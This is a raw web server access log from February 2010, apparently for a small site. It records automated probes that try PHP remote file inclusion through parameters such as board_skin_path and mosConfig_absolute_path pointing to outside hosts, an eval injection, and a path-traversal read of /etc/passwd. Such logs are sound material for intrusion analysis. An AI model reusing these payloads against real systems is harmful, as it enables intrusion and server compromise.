109.123.78.44 - - [06/Feb/2010:09:08:54 -0800] "GET /logs/access.log//bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.getyourselfahorse.com"
173.165.1.69 - - [06/Feb/2010:09:09:00 -0800] "GET /logs/access_091121.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
109.123.78.44 - - [06/Feb/2010:09:09:10 -0800] "GET /logs/access.log//bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.getyourselfahorse.com"
211.108.61.176 - - [06/Feb/2010:09:09:51 -0800] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
211.108.61.176 - - [06/Feb/2010:09:09:52 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 200 915 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
211.108.61.176 - - [06/Feb/2010:09:09:53 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 200 1087 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
212.150.147.153 - - [06/Feb/2010:09:10:57 -0800] "GET /logs/access.log//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.150.147.153 - - [06/Feb/2010:09:11:18 -0800] "GET /logs/access_100116.log//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
109.123.78.44 - - [06/Feb/2010:09:12:09 -0800] "GET /logs/access_100116.log//bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.getyourselfahorse.com"
109.123.78.44 - - [06/Feb/2010:09:12:26 -0800] "GET /logs/access_100116.log//bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.getyourselfahorse.com"
212.150.147.153 - - [06/Feb/2010:09:12:46 -0800] "GET /logs/access.log//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.108.61.176 - - [06/Feb/2010:09:12:49 -0800] "GET /logs/access_100130.log///?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
212.150.147.153 - - [06/Feb/2010:09:13:51 -0800] "GET /logs/access_100116.log//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
173.165.1.69 - - [06/Feb/2010:09:14:21 -0800] "GET /logs/access_100123.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
173.165.1.69 - - [06/Feb/2010:09:14:42 -0800] "GET /logs/access_100130.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
210.127.209.105 - - [06/Feb/2010:09:15:35 -0800] "GET /logs/access_091024.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
210.127.209.105 - - [06/Feb/2010:09:15:35 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
210.127.209.105 - - [06/Feb/2010:09:15:36 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
210.127.209.105 - - [06/Feb/2010:09:18:19 -0800] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.7.219.40 - - [06/Feb/2010:09:20:04 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.londonjudo.org.uk/cms/f1??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.7.219.40 - - [06/Feb/2010:09:20:31 -0800] "GET /logs/access_091121.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.londonjudo.org.uk/cms/f1??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
173.165.1.69 - - [06/Feb/2010:09:22:51 -0800] "GET /logs/access_091121.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:09:29:43 -0800] "GET /logs//bbs////write_comment_update.php?board_skin_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:09:29:43 -0800] "GET /logs/access.log%20%20//bbs////write_comment_update.php?board_skin_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:09:29:43 -0800] "GET /bbs////write_comment_update.php?board_skin_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:09:31:25 -0800] "GET /bbs////write_comment_update.php?board_skin_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:09:31:25 -0800] "GET /logs/access.log%20%20//bbs////write_comment_update.php?board_skin_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:09:31:25 -0800] "GET /logs//bbs////write_comment_update.php?board_skin_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
209.90.101.2 - - [06/Feb/2010:09:31:40 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.getyourselfahorse.com"
209.90.101.2 - - [06/Feb/2010:09:31:40 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.getyourselfahorse.com"
209.90.101.2 - - [06/Feb/2010:09:31:41 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.getyourselfahorse.com"
65.55.207.54 - - [06/Feb/2010:09:31:42 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.getyourselfahorse.com"
109.123.78.44 - - [06/Feb/2010:09:32:37 -0800] "GET /logs/access.log//bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/log.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.getyourselfahorse.com"
109.123.78.44 - - [06/Feb/2010:09:32:37 -0800] "GET /logs//bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/log.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.getyourselfahorse.com"
186.28.232.13 - - [06/Feb/2010:09:33:05 -0800] "GET /logs/access.log//errors.php?error=http://www.openbee.org/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
186.28.232.13 - - [06/Feb/2010:09:33:05 -0800] "GET /logs//errors.php?error=http://www.openbee.org/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
186.28.232.13 - - [06/Feb/2010:09:33:05 -0800] "GET /errors.php?error=http://www.openbee.org/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:09:33:23 -0800] "GET /logs/access.log%20%20//bbs////write_comment_update.php?board_skin_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:09:33:23 -0800] "GET /bbs////write_comment_update.php?board_skin_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:09:33:23 -0800] "GET /logs//bbs////write_comment_update.php?board_skin_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
213.171.37.206 - - [06/Feb/2010:09:34:13 -0800] "GET /logs/access.log//errors.php?error=http://hypotheekservice.net/images/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
213.171.37.206 - - [06/Feb/2010:09:34:13 -0800] "GET /errors.php?error=http://hypotheekservice.net/images/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
213.171.37.206 - - [06/Feb/2010:09:34:13 -0800] "GET /logs//errors.php?error=http://hypotheekservice.net/images/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
186.28.232.13 - - [06/Feb/2010:09:34:18 -0800] "GET /logs/access_100130.log//errors.php?error=http://www.openbee.org/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:09:34:27 -0800] "GET /bbs////write_comment_update.php?board_skin_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:09:34:27 -0800] "GET /logs/access.log%20%20//bbs////write_comment_update.php?board_skin_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:09:34:27 -0800] "GET /logs//bbs////write_comment_update.php?board_skin_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
213.171.37.206 - - [06/Feb/2010:09:35:42 -0800] "GET /logs/access_100130.log//errors.php?error=http://hypotheekservice.net/images/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
109.123.78.44 - - [06/Feb/2010:09:36:31 -0800] "GET /logs/access_100130.log//bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/log.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.getyourselfahorse.com"
109.123.78.44 - - [06/Feb/2010:09:36:32 -0800] "GET /logs//bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/log.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.getyourselfahorse.com"
87.250.252.242 - - [06/Feb/2010:09:39:39 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.getyourselfahorse.com"
109.123.78.44 - - [06/Feb/2010:09:41:45 -0800] "GET /logs/access_100116.log//bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/log.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.getyourselfahorse.com"
174.121.45.220 - - [06/Feb/2010:09:45:18 -0800] "GET /logs/access_100130.log//bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
174.121.45.220 - - [06/Feb/2010:09:45:18 -0800] "GET /bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
174.121.45.220 - - [06/Feb/2010:09:45:18 -0800] "GET /logs//bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
58.150.99.131 - - [06/Feb/2010:09:46:43 -0800] "GET /board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.131 - - [06/Feb/2010:09:46:43 -0800] "GET /logs/access.log%20%20//board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.131 - - [06/Feb/2010:09:46:43 -0800] "GET /logs//board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
174.121.45.220 - - [06/Feb/2010:09:48:00 -0800] "GET /logs/access.log//bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
174.121.45.220 - - [06/Feb/2010:09:48:00 -0800] "GET /bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
174.121.45.220 - - [06/Feb/2010:09:48:00 -0800] "GET /logs//bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
174.121.45.220 - - [06/Feb/2010:09:48:39 -0800] "GET /bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.0" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
125.248.104.130 - - [06/Feb/2010:09:54:34 -0800] "GET /logs/access_100130.log//ask_password.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.248.104.130 - - [06/Feb/2010:09:54:34 -0800] "GET /logs//ask_password.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.248.104.130 - - [06/Feb/2010:09:54:34 -0800] "GET /ask_password.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.248.104.130 - - [06/Feb/2010:09:55:43 -0800] "GET /logs/access.log//ask_password.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
65.55.207.54 - - [06/Feb/2010:09:55:58 -0800] "GET /logs/access_091219.log HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.getyourselfahorse.com"
125.248.104.130 - - [06/Feb/2010:09:55:59 -0800] "GET /logs/access_100130.log//ask_password.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.248.104.130 - - [06/Feb/2010:09:55:59 -0800] "GET /ask_password.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.248.104.130 - - [06/Feb/2010:09:55:59 -0800] "GET /logs//ask_password.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.131 - - [06/Feb/2010:09:56:03 -0800] "GET /logs//board_skin_path=http://www.qqe.ru/forum//attachments/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.131 - - [06/Feb/2010:09:56:03 -0800] "GET /logs/access.log%20%20//board_skin_path=http://www.qqe.ru/forum//attachments/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.131 - - [06/Feb/2010:09:56:03 -0800] "GET /board_skin_path=http://www.qqe.ru/forum//attachments/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:09:56:56 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:09:56:56 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:09:56:56 -0800] "GET /logs/access_091121.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.248.104.130 - - [06/Feb/2010:09:57:19 -0800] "GET /logs/access.log//ask_password.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.248.104.130 - - [06/Feb/2010:09:57:20 -0800] "GET /logs/access_100130.log//ask_password.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.248.104.130 - - [06/Feb/2010:09:57:20 -0800] "GET /ask_password.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.248.104.130 - - [06/Feb/2010:09:57:20 -0800] "GET /logs//ask_password.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
61.250.92.167 - - [06/Feb/2010:09:57:25 -0800] "GET /logs/access_100116.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
61.250.92.167 - - [06/Feb/2010:09:57:25 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
61.250.92.167 - - [06/Feb/2010:09:57:25 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.248.104.130 - - [06/Feb/2010:09:58:04 -0800] "GET /logs/access_100116.log//ask_password.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.248.104.130 - - [06/Feb/2010:09:58:04 -0800] "GET /ask_password.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.248.104.130 - - [06/Feb/2010:09:58:04 -0800] "GET /logs//ask_password.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
174.121.45.220 - - [06/Feb/2010:09:58:30 -0800] "GET /logs/access_100116.log//bbs//write_update.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:09:58:49 -0800] "GET /logs/access_100116.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
61.250.92.167 - - [06/Feb/2010:09:59:09 -0800] "GET /logs/access_100116.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
61.250.92.167 - - [06/Feb/2010:09:59:09 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
61.250.92.167 - - [06/Feb/2010:09:59:09 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
88.198.197.249 - - [06/Feb/2010:10:00:07 -0800] "GET /logs/access.log//write_comment_update.php?bo_table=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
88.198.197.249 - - [06/Feb/2010:10:00:08 -0800] "GET /write_comment_update.php?bo_table=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
88.198.197.249 - - [06/Feb/2010:10:00:08 -0800] "GET /logs//write_comment_update.php?bo_table=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
61.250.92.167 - - [06/Feb/2010:10:00:27 -0800] "GET /logs/access_100130.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:10:01:03 -0800] "GET /logs/access_100130.log%20%20//bbs////write_comment_update.php?board_skin_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:10:01:06 -0800] "GET /logs/access_100130.log%20%20//bbs////write_comment_update.php?board_skin_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:10:01:08 -0800] "GET /logs/access_100130.log%20%20//bbs////write_comment_update.php?board_skin_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:10:01:29 -0800] "GET /logs/access_100130.log%20%20//bbs////write_comment_update.php?board_skin_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
61.250.92.167 - - [06/Feb/2010:10:01:43 -0800] "GET /logs/access_100130.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:10:02:12 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:10:02:12 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:10:02:12 -0800] "GET /logs/access_091121.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
61.250.92.167 - - [06/Feb/2010:10:02:20 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
61.250.92.167 - - [06/Feb/2010:10:02:56 -0800] "GET /logs/access_100130.log%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
61.250.92.167 - - [06/Feb/2010:10:02:56 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
61.250.92.167 - - [06/Feb/2010:10:02:56 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
61.250.92.167 - - [06/Feb/2010:10:03:15 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
61.250.92.167 - - [06/Feb/2010:10:03:15 -0800] "GET /logs/access.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
61.250.92.167 - - [06/Feb/2010:10:03:15 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:10:03:24 -0800] "GET /logs/access_100116.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
61.250.92.167 - - [06/Feb/2010:10:03:31 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
61.250.92.167 - - [06/Feb/2010:10:03:31 -0800] "GET /logs/access_100130.log%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
61.250.92.167 - - [06/Feb/2010:10:03:31 -0800] "GET /index.php?option=com_mambatsta